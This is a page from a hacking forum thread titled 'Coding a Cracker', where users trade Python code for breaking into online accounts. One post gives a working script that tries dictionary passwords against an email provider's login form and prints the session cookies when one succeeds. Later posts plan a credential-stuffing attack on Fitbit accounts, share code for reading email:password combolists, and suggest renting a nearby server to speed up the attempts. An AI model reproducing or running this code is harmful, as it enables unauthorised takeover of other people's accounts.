Skip to content
MPGHThe Dark Arts
/
RegisterLog in
Forum
Community
What's NewLatest posts across the boardTrendingHottest threads right nowSubscribedThreads you follow
Discussion
GeneralIntroductionsEntertainmentDebate FortFlaming & Rage
Board
News & AnnouncementsMPGH TimesSuggestions & HelpGiveaways
More Sections
Art & Graphic DesignProgrammingHackingCryptocurrency
Hacks & Cheats
Games
ValorantCS2 / CS:GOCall of Duty / WarzoneFortniteApex LegendsEscape From Tarkov
+14 moreLeague of LegendsGTA VMinecraftRustROTMGBattlefieldTroveBattleOnCombat ArmsCrossFireBlackshotRuneScapeDayZDead by Daylight
Resources
Game Hacking TutorialsReverse EngineeringGeneral Game HackingAnti-CheatConsole Game Hacking
Tools
Game Hacking ToolsTrainers & CheatsHack/Release NewsNew
Submit a release →Share your cheat, tool, or config with the community.
AINEW
AI Tools
General & DiscussionPrompt EngineeringLLM JailbreaksHotAI Agents & AutomationLocal / Open Models
AI × Gaming
AI Aimbots & VisionML Anti-CheatGame Bots & Automation
Create
AI Coding / Vibe CodingAI Art & MediaAI Voice & TTS
The AI frontier →Where game hacking meets modern machine learning. Jump in.
Marketplace
Buy & Sell
SellingBuyingTradingUser Services
Trust & Safety
Middleman LoungeMarketplace TalkVouch Copy Profiles
Money
Cryptocurrency TalkCurrency ExchangeWork & Job Offers
Start selling →List accounts, services, and goods. Use the middleman to trade safe.
MPGH The Dark Arts

A community for offensive security research, reverse engineering, and AI.

Community

ForumMarketplaceSearch

Account

RegisterLog in

Legal

Privacy PolicyForum RulesHelp & FAQ
© 2026 MPGH · All rights reserved.Built by the community, for the community. For educational purposes onlyContent is shared for security research and education — we don't condone illegal use. You're responsible for complying with applicable laws. Use at your own risk.
Home › Forum › Programming › Coders Lounge › Coding a Cracker

LightbulbCoding a Cracker

Posts 16–30 of 35 · Page 2 of 3
AS
ASERHaerheadrherherh
Quote Originally Posted by Nimboso View Post
I'd go python. Its a super easy language to write a brute forcer in. Here's an example of one I wrote for an email service. No proxy support or captcha bypass though. Just a basic example.

Code:
    import requests, sys
    from bs4 import BeautifulSoup

    ses = requests.Session()
    login = ses.get('https://www.gm*****.uk/#.1730818-header-navlogin2-1')

    soup_login = BeautifulSoup(login.content, 'html5lib').find('form').find_all('input')
    loginDict = {}
    for u in soup_login:
        if u.has_attr('value'):
            loginDict[u['name']] = u['value']
    loginDict['username'] = 'hackmereddit@gm*****.uk'

    with open('dict.txt', 'r') as dict:
        for word in dict:
            word = word.strip()
            loginDict['password'] = word
            resp = ses.post('https://login.gm*****.uk/login', data=loginDict)
            print(word)
            if '.navigator-bs.gm*****.uk' in resp.cookies.list_domains():
                print(word)
                print(resp.cookies)
                sys.exit()
But you know, no one really likes python, and coding with some C language or .NET makes you look cooler
#16 · 9y ago
BlueCow
BlueCow
I just installed requests (it looks easier to use) so, i'm gonna try and reproduce what you've done with requests to crack fitbit accounts, might need help with opening the file and splitting the combos. I'll keep you posted.
#17 · 9y ago
Nimboso
Nimboso
Quote Originally Posted by BlueCow View Post
I just installed requests (it looks easier to use) so, i'm gonna try and reproduce what you've done with requests to crack fitbit accounts, might need help with opening the file and splitting the combos. I'll keep you posted.
Should be pretty easy, it doesn't look like the fitbit dashboard has any captcha. If you get it working, I'd recommend renting a $5 VPS somewhere as close as you can get to the fitbit login server. A large time waste in brute forcing is network delay.
#18 · edited 9y ago · 9y ago
BlueCow
BlueCow
Well thanks for the information. I'll have to check this out later cuz for some reason I get errors importing requests into the python default IDLE but not when I use my terminal.
#19 · 9y ago
Nimboso
Nimboso
Quote Originally Posted by BlueCow View Post
Well thanks for the information. I'll have to check this out later cuz for some reason I get errors importing requests into the python default IDLE but not when I use my terminal.
You should use pycharm and python 3.x, whatever the newest one is
#20 · 9y ago
s p a c ebound
s p a c ebound
Quote Originally Posted by BlueCow View Post
Well thanks for the information. I'll have to check this out later cuz for some reason I get errors importing requests into the python default IDLE but not when I use my terminal.
Let us know how it goes man.
#21 · 9y ago
Dead Meme
Dead Meme
This isn't my area of expertise but I'd say try to borrow (not steal) some code from other crackers.
#22 · 9y ago
BlueCow
BlueCow
Quote Originally Posted by Dead Meme View Post
This isn't my area of expertise but I'd say try to borrow (not steal) some code from other crackers.
Yup, I tried that.
#23 · 9y ago
BlueCow
BlueCow
Okay guys, so, I haven't worked on it for a long time but I thought about it today I did a bit more research and I encountered a problem. For now, the username and password to test on fitbi*****m are stored in 2 variables and so that means that I have to stop the program everytime they have been checked and change the combo to test another one. So, what I want to do is open a file called "combolist.txt" and for each line (one combo per line in emailass format), split the email and temporarily store it in the username variable and split the password and store it in the password variable. Once that's done the program will test this combo for fitbi*****m and return the result. Once it has tested it, it will go to the next line of the combolist.txt file and repeat the process. How can I open the file and split the combo accordingly and store the string in the 2 variables in python? Any help would be very appreaciated!!

Btw here's what I have so far:
Code:
f = open("combolist.txt", "r")
for combo in f:
f.split(":")

I know it's probably wrong but that's why I'm asking for help. Thank you !
#24 · 9y ago
Nimboso
Nimboso
Quote Originally Posted by BlueCow View Post
Okay guys, so, I haven't worked on it for a long time but I thought about it today I did a bit more research and I encountered a problem. For now, the username and password to test on fitbi*****m are stored in 2 variables and so that means that I have to stop the program everytime they have been checked and change the combo to test another one. So, what I want to do is open a file called "combolist.txt" and for each line (one combo per line in emailass format), split the email and temporarily store it in the username variable and split the password and store it in the password variable. Once that's done the program will test this combo for fitbi*****m and return the result. Once it has tested it, it will go to the next line of the combolist.txt file and repeat the process. How can I open the file and split the combo accordingly and store the string in the 2 variables in python? Any help would be very appreaciated!!

Btw here's what I have so far:
Code:
f = open("combolist.txt", "r")
for combo in f:
f.split(":")

I know it's probably wrong but that's why I'm asking for help. Thank you !
Code:
with open('file.txt', 'r') as combolist:
    for combo in combolist:
        split = combo.split()
        if len(split) < 2:
            continue
        username = split[0]
        password = split[1]

        # Attempt login here
using the "with open as file" closes the file on it's own when your script is done running.
#25 · edited 9y ago · 9y ago
JA
javalover
Quote Originally Posted by Nimboso View Post
Code:
with open('file.txt', 'r') as combolist:
    for combo in combolist:
        split = combo.split()
        if len(split) < 2:
            continue
        username = split[0]
        password = split[1]

        # Attempt login here
using the "with open as file" closes the file on it's own when your script is done running.
You missed to split the ':' here:
Code:
split = combo.split()
instead of splitting a space (by default that method's parameter gets a space).
#26 · 9y ago
BlueCow
BlueCow
Quote Originally Posted by Nimboso View Post
Code:
with open('file.txt', 'r') as combolist:
    for combo in combolist:
        split = combo.split()
        if len(split) < 2:
            continue
        username = split[0]
        password = split[1]

        # Attempt login here
using the "with open as file" closes the file on it's own when your script is done running.
So that's the code:
Code:
with open('file.txt', 'r') as combolist:
    for combo in combolist:
        split = combo.split(:)
        if len(split) < 2:
            continue
        username = split[0]
        password = split[1]

        # Attempt login here
Sorry, for answering so late, I was off mpgh for a while, thanks for the info.
#27 · 9y ago
Smirnoffq
Smirnoffq
I have sad news for you... fitbit website is loaded dynamicaly with js, so requests wont work well (at least ony experience. I might be wrong ofc)
#28 · 9y ago
Nimboso
Nimboso
Quote Originally Posted by Smirnoffq View Post
I have sad news for you... fitbit website is loaded dynamicaly with js, so requests wont work well (at least ony experience. I might be wrong ofc)
With making the direct requests it doesn't matter if the page is loaded using js since you never actually load the page.
#29 · 9y ago
HarryMidnight
HarryMidnight
Quote Originally Posted by Nimboso View Post
Pycharm is a good one, it's what I use.
InteliJ IDEA (With python addon) for the win...
#30 · 9y ago
Posts 16–30 of 35 · Page 2 of 3

Post a Reply

Similar Threads

  • Selling Brute Force/Cracker Source CodeBy johnstalie in Selling Accounts/Keys/Items
    3Last post 13y ago
  • AQW code crackers...By vincelee1998 in Adventure Quest Worlds (AQW) Help
    1Last post 12y ago
  • Minecraft Cracker / Gift Code Methods / MC Accounts / Poison PluginBy Sandwich in Selling Accounts/Keys/Items
    17Last post 12y ago
  • How long till a code cracker comes out XDBy santasfoot in Rust Discussions & Help
    0Last post 12y ago
  • Sell pw cracker for runescape for retail code!!!By Maartenthebest in Trade Accounts/Keys/Items
    11Last post 19y ago

Tags for this Thread

#c++#coding#cracker#help#language#mac#python